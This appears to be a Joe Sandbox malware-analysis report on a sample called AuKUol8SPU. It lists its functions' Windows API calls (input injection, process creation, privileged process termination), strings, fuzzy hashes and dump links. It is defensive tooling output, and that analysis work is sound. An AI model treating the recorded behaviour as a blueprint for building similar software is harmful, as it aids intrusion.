Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: afa6e93990939abf408509d327148be4a8d4b9af12f3e560249209c6b9176d4e
Instruction ID: 4e3abca15eef4d238104d0417699757c1f9a383312d9522efd283b32e92cff39
Opcode Fuzzy Hash: afa6e93990939abf408509d327148be4a8d4b9af12f3e560249209c6b9176d4e
Instruction Fuzzy Hash: EAC124B1608305AFC700EF68C88492AB7E9FF89358F40499DF58ADB261DB71ED05CB52

Function 00B77990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00B77A6C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: b40c9b53adf9a2e4c2decdc1fa983cab26e5dcf15d967a87107a6751d3dcd485
Instruction ID: 8cf4f7c2dad58ce2f4df51a7183f14e7cd30d95b112c0352260a604bf5e6bd64
Opcode Fuzzy Hash: b40c9b53adf9a2e4c2decdc1fa983cab26e5dcf15d967a87107a6751d3dcd485
Instruction Fuzzy Hash: A0B1A17194421A9FDB01DFA4C895BBEB7F4FF09321F2084A9E629E7341DB34A941CB91

Function 00B711CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B711F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B70268,?,00000001), ref: 00B71204
GetWindowThreadProcessId.USER32(00000000), ref: 00B7120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B70268,?,00000001), ref: 00B7121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B7122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B70268,?,00000001), ref: 00B71245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B70268,?,00000001), ref: 00B71257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B70268,?,00000001), ref: 00B7129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B70268,?,00000001), ref: 00B712B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B70268,?,00000001), ref: 00B712BC

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 527939d4a669548096a4e42034423a726aa41696ce1f74fb864b22ea71fa9f6a
Instruction ID: e4d3345e129d38ac8c5c8d2c478e91bbeb63a49067d028a8e0390398eef4ff1e
Opcode Fuzzy Hash: 527939d4a669548096a4e42034423a726aa41696ce1f74fb864b22ea71fa9f6a
Instruction Fuzzy Hash: C831CE75A01204BBDB209F5CED88B79B7F9EB55321F10C56AF818D71A1EB709D40CB60

Function 00B6A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00B6A439), ref: 00B6A377

Strings

TEXT, xrefs: 00B6A2AE
NAME, xrefs: 00B6A1A9
INSTANCE, xrefs: 00B6A285
REGEXPCLASS, xrefs: 00B6A13C
CLASSNN, xrefs: 00B6A119
CLASS, xrefs: 00B6A0F6

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 27353a5e381e912f9dfeea571f2e88618b15526a9852274c685120f2d75c6833
Instruction ID: 18656946be7a460a29d5be93a787eaac117b0e33a98c5cca8767c094d998fead
Opcode Fuzzy Hash: 27353a5e381e912f9dfeea571f2e88618b15526a9852274c685120f2d75c6833
Instruction Fuzzy Hash: C191A031600606AACF08EFA4C492BEEFBE4FF15300F548199E85AB7241DF356999CF95

Function 00B9B351 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01705AD0), ref: 00B9B3EB
IsWindowEnabled.USER32(01705AD0), ref: 00B9B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B9B4DB
SendMessageW.USER32(01705AD0,000000B0,?,?), ref: 00B9B512
IsDlgButtonChecked.USER32(?,?), ref: 00B9B54F
GetWindowLongW.USER32(01705AD0,000000EC), ref: 00B9B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B9B589

Strings

@U=u, xrefs: 00B9B4DB, 00B9B512, 00B9B589

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID: @U=u
API String ID: 4072528602-2594219639
Opcode ID: 34ce5ad7f3da1e7ebf7c160c8db1fb60fb2217a25c5c1f3a4578aa75e9459005
Instruction ID: c67579a52addfa8fb2315b5ba5f2796911a925c2d43a70c15180fe77f2cfcccd
Opcode Fuzzy Hash: 34ce5ad7f3da1e7ebf7c160c8db1fb60fb2217a25c5c1f3a4578aa75e9459005
Instruction Fuzzy Hash: 82718E34605204EFDF209F64EAD4FBABBF5EF09310F1441AAE945973A2CB31A950EB50

Function 00B96D80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B96E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00B96E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B96E52
_wcscat.LIBCMT ref: 00B96EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00B96EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B96EF2

Strings

@U=u, xrefs: 00B96E24, 00B96E38
SysListView32, xrefs: 00B96DF6

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: @U=u$SysListView32
API String ID: 307300125-1908207174
Opcode ID: 6876a98fe17c22792954e8f904788dff326507fbaceb11b7fb492f87940a0e19
Instruction ID: 6278f4f5663c7b04f61d882e286fed15ec3e5b6ff98a43e480bc554d06d57c30
Opcode Fuzzy Hash: 6876a98fe17c22792954e8f904788dff326507fbaceb11b7fb492f87940a0e19
Instruction Fuzzy Hash: 60418175A00349ABEF219F64CC85BEEB7E8EF08760F1044BAF594E7291D6719D84CB60

Function 00B962CD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B962EC
GetWindowLongW.USER32(01705AD0,000000F0), ref: 00B9631F
GetWindowLongW.USER32(01705AD0,000000F0), ref: 00B96354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B96386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B963B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00B963C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B963DB

Strings

@U=u, xrefs: 00B962EC, 00B96386, 00B963B0

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: @U=u
API String ID: 2178440468-2594219639
Opcode ID: 59d3589d4375032dfe8aec1bc13e64814afe9e7eef608dd654803ec7c8c32bc3
Instruction ID: b9e57e5b08d2557ff01dab0d2c156ab96ab59f80276810f2167f27afcfa3a21e
Opcode Fuzzy Hash: 59d3589d4375032dfe8aec1bc13e64814afe9e7eef608dd654803ec7c8c32bc3
Instruction Fuzzy Hash: E031F030648255AFDB218F19DC85F643BE1FB4A724F1901B6F501CB2B2CB72A840EB54

Function 00B88C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B9F910), ref: 00B88D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B9F910), ref: 00B88D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B88ED6
SysFreeString.OLEAUT32(?), ref: 00B88F00

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 3bf47559039e8c70ab023ac16ad3b6f042d76e45676ffb81075047ae3272d023
Instruction ID: 76b2d00083e3bcfbc016e83ec3279b9cdf176ff4f349dc0fcb61098c0c20ea8d
Opcode Fuzzy Hash: 3bf47559039e8c70ab023ac16ad3b6f042d76e45676ffb81075047ae3272d023
Instruction Fuzzy Hash: 88F14871A00209EFCF14EF94C884EAEB7B9FF49315F548498F905AB261DB31AE45CB90

Function 00B8F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B8F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B8F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B8F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B8F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B8F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B8FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B8FA7C
CloseHandle.KERNEL32(?), ref: 00B8FAAB
CloseHandle.KERNEL32(?), ref: 00B8FB22

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: a03e8880ead7b1ed7610b32e19f156fddab16b4636a26f33086af6772fe6e7b2
Instruction ID: c9b49985973894af1a55aa7c07dcf8b7032ef96458a754389e0d2fba5643b415
Opcode Fuzzy Hash: a03e8880ead7b1ed7610b32e19f156fddab16b4636a26f33086af6772fe6e7b2
Instruction Fuzzy Hash: 07E1B0316042429FCB14FF24C891B7ABBE1EF85350F1489ADF8999B2A2DB31DD45CB52

Function 00B74CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B73697,?), ref: 00B7468B

Part of subcall function 00B7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B73697,?), ref: 00B746A4

Part of subcall function 00B74A31: GetFileAttributesW.KERNEL32(?,00B7370B), ref: 00B74A32

lstrcmpiW.KERNEL32(?,?), ref: 00B74D40
_wcscmp.LIBCMT ref: 00B74D5A
MoveFileW.KERNEL32(?,?), ref: 00B74D75

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: ac3bcbc6d21cc91d8ce3175bb2a71e46d4e0a91359766370a21c8fc0bc251da9
Instruction ID: 4f409f8db80bf5a3fa41c5d68e5d4ed04c85c44b98857ef6f11a24b201f426e9
Opcode Fuzzy Hash: ac3bcbc6d21cc91d8ce3175bb2a71e46d4e0a91359766370a21c8fc0bc251da9
Instruction Fuzzy Hash: 11514DB20083859BC724EBA4D8819DFB3ECEF85351F50496EF299D3151EF34A688C766

Function 00B6966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B6A84C
Part of subcall function 00B6A82C: GetCurrentThreadId.KERNEL32 ref: 00B6A853
Part of subcall function 00B6A82C: AttachThreadInput.USER32(00000000,?,00B69683,?,00000001), ref: 00B6A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 00B6968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B696AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00B696AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 00B696B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B696D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00B696D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 00B696E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B696F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00B696FB

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: a39396238b0ab4aa6c60c314c5d8fe4480baf4e202230f8dca33bca30b8c13f7
Instruction ID: 9aea1e8276b77152e26dafd56900d24757a01e0e2e0efe247f0053a4bf0d1f19
Opcode Fuzzy Hash: a39396238b0ab4aa6c60c314c5d8fe4480baf4e202230f8dca33bca30b8c13f7
Instruction Fuzzy Hash: 6E118EB1950619BEFA106B60DC89F7A7A6DEB4C761F110426F344AB0A1CDF26C50DAE4

Function 00B68921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00B6853C,00000B00,?,?), ref: 00B6892A
HeapAlloc.KERNEL32(00000000,?,00B6853C,00000B00,?,?), ref: 00B68931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B6853C,00000B00,?,?), ref: 00B68946
GetCurrentProcess.KERNEL32(?,00000000,?,00B6853C,00000B00,?,?), ref: 00B6894E
DuplicateHandle.KERNEL32(00000000,?,00B6853C,00000B00,?,?), ref: 00B68951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00B6853C,00000B00,?,?), ref: 00B68961
GetCurrentProcess.KERNEL32(00B6853C,00000000,?,00B6853C,00000B00,?,?), ref: 00B68969
DuplicateHandle.KERNEL32(00000000,?,00B6853C,00000B00,?,?), ref: 00B6896C
CreateThread.KERNEL32(00000000,00000000,00B68992,00000000,00000000,00000000), ref: 00B68986

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 2e9f5c7a0ce7da19c693d6b43104a4d3c6ea6cd656fefa02d3deebfbe1603c94
Instruction ID: 5ff7d3920bc7f5505e752858e8f6bcddc70c3d0700737da071c4b5d0bdbf6d2c
Opcode Fuzzy Hash: 2e9f5c7a0ce7da19c693d6b43104a4d3c6ea6cd656fefa02d3deebfbe1603c94
Instruction Fuzzy Hash: A501BF75240305FFEB10ABA5DD4DF6B3BACEB89711F504422FA05DB1A1CA749800CB64

Function 00B89113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B89167
VariantInit.OLEAUT32(?), ref: 00B89238
VariantInit.OLEAUT32(?), ref: 00B89339
VariantClear.OLEAUT32(?), ref: 00B89343
VariantClear.OLEAUT32(?), ref: 00B893A0

Strings

Null Object assignment in FOR..IN loop, xrefs: 00B891C8, 00B892F6, 00B893AE
Incorrect Object type in FOR..IN loop, xrefs: 00B8931C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: fe12af9a081cd0bb508034007ccb3a9f1e299d188b342a8c89066e31945e8fb0
Instruction ID: b88ea9ae6cf157045d6be772de973152a23df15acfd7833e50eeac51ee9d4424
Opcode Fuzzy Hash: fe12af9a081cd0bb508034007ccb3a9f1e299d188b342a8c89066e31945e8fb0
Instruction Fuzzy Hash: 15919F71A00219EBDF24EFA5C888FBEB7F8EF45710F148199F515AB2A0D7709941CBA0

Function 00B8975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00B6710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B67044,80070057,?,?,?,00B67455), ref: 00B67127
Part of subcall function 00B6710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B67044,80070057,?,?), ref: 00B67142
Part of subcall function 00B6710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B67044,80070057,?,?), ref: 00B67150
Part of subcall function 00B6710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B67044,80070057,?), ref: 00B67160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00B89806
_memset.LIBCMT ref: 00B89813
_memset.LIBCMT ref: 00B89956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00B89982
CoTaskMemFree.OLE32(?), ref: 00B8998D

Strings

NULL Pointer assignment, xrefs: 00B899DB

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 7910b5d92670c9d643e4d18f53c0471370c5d1115e974ef5b9cda2ce7c821b3b
Instruction ID: f2e7e6a6881a3c7c0ae1277f9efa3a314c0b8c6bf6d9df96300e40fc3b0dba32
Opcode Fuzzy Hash: 7910b5d92670c9d643e4d18f53c0471370c5d1115e974ef5b9cda2ce7c821b3b
Instruction Fuzzy Hash: 43911771D00219EBDF10EFA5DC85EEEBBB9EF08350F20419AF419A7251DB715A44CBA0

Function 00B8E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00B73C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00B73C7A
Part of subcall function 00B73C55: Process32FirstW.KERNEL32(00000000,?), ref: 00B73C88
Part of subcall function 00B73C55: CloseHandle.KERNEL32(00000000), ref: 00B73D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B8E9A4
GetLastError.KERNEL32 ref: 00B8E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B8E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 00B8EA63
GetLastError.KERNEL32(00000000), ref: 00B8EA6E
CloseHandle.KERNEL32(00000000), ref: 00B8EAA3

Strings

SeDebugPrivilege, xrefs: 00B8E9C2

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 174d897ece2124249dee905b4dc33a9431269f548b4320f5786b276adf4c08b8
Instruction ID: d193f8f9825aae2bf7a065e5620199fdb6c1910bb1819147d7c356998bbccb90
Opcode Fuzzy Hash: 174d897ece2124249dee905b4dc33a9431269f548b4320f5786b276adf4c08b8
Instruction Fuzzy Hash: 1441BC312002019FDB14EF24CCA5FBDB7E5AF41750F1484A9F9169B2E2CB74E944CB95

Function 00B9B69E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00BD57B0,00000000,01705AD0,?,?,00BD57B0,?,00B9B5A8,?,?), ref: 00B9B712
